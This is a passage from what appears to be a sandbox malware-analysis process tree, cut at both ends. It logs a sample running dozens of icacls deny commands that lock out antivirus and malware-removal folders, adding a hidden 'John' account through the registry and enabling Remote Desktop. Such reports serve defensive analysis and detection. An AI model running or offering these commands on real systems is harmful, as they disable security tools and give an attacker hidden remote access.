        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3420
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5936
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:5860
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4524
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      PID:1284
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4648
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:648
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4704
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      PID:5880
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:6140
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
      4⤵
      PID:4892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:1856
    - - C:\Windows\system32\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:5108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
      4⤵
      PID:3188
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:5660
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        
        PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:672
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5932
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:5140
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
        5⤵
        
        PID:2640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
      4⤵
      PID:1280
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\FRST /deny system:(OI)(CI)(F)
        5⤵
        
        PID:4524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5132
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5952
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2444
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4364
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:2596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4864
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5384
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5140
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4524
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:4340
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2720
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3524
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3040
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3024
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:760
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:5296
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5368
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5132
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:2760
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5028
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      PID:5716
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1844
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5576
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3024
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5520
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5780
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3968
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:396
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      4⤵
      PID:2856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        5⤵
        Hide Artifacts: Hidden Users
        
        PID:960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      4⤵
      PID:4704
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:3196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
      4⤵
      PID:1756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f
        5⤵
        Hide Artifacts: Hidden Users
        
        PID:220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5672
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:4940
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3872
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:2444
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1280
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1856
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
      4⤵
      PID:2652
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5188
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
      4⤵
      PID:5516
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2856
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5876
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
      4⤵
      PID:2596
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5856
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
      4⤵
      PID:972
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:5952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5964
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:3968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:452
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:5416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2652
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5712
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5516
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5236
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2616
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1192
    - - C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:1212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2292
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:1564
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2596
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5140
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:3472
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5956
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
      4⤵
      PID:5376
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
        5⤵
        
        PID:3700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:2344
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
      4⤵
      PID:2796
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6020
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
      4⤵
      PID:3940
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3184
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
        5⤵
        
        PID:4932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
      4⤵
      PID:2252
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:6000
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2640
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
      4⤵
      PID:5028
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3872
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5564
    - - C:\Windows\System32\Conhost.exe
        
